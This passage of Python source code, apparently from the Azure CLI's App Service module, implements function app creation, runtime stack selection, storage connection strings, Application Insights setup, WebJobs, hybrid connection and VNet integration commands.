default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
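# create_function resolves the runtime from the hard-coded stacks JSON: the --runtime/--runtime-version pair
# must be supported for the chosen --functions-version and OS, dotnet versions are derived solely from
# --functions-version, and a runtime is mandatory for Linux apps that don't use a custom container image.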
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
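# Maps the --functions-version value to the FUNCTIONS_EXTENSION_VERSION app setting value,
# e.g. '3' -> '~3'; defaults to '~2' when no version is given.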
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
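# Converts camelCase stack-config property names to the snake_case attribute names set on the SiteConfig model,
# e.g. 'netFrameworkVersion' -> 'net_framework_version' (illustrative).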
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
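# Normalizes a runtime version string to a float for comparison; strings matching neither the windows nor the
# linux version pattern fall back to plain float conversion (e.g. '3.1' -> 3.1, illustrative), or 0 if that fails.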
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def _get_content_share_name(app_name):
    # content share name should be up to 63 characters long, consist of lowercase letters and digits, and be random
    # so take the first 50 characters of the app name and append the last 12 hex characters of a random uuid
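    # Illustrative example (hypothetical app name): 'MyContosoFunctions' -> 'mycontosofunctions' + 'a1b2c3d4e5f6'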
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # We emit this success message as a warning so it does not interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
        error_message += ' Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
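# Returns consumption-plan locations as lower-cased names with spaces removed,
# e.g. 'West US' -> {'name': 'westus'} (illustrative).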
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
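    # Kudu reports the deployment status as an integer; below, 3 is treated as a failed deployment and 4 as
    # success. With no explicit timeout this polls every 2 seconds for up to 450 attempts (roughly 15 minutes).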
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensures the key type input is valid
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
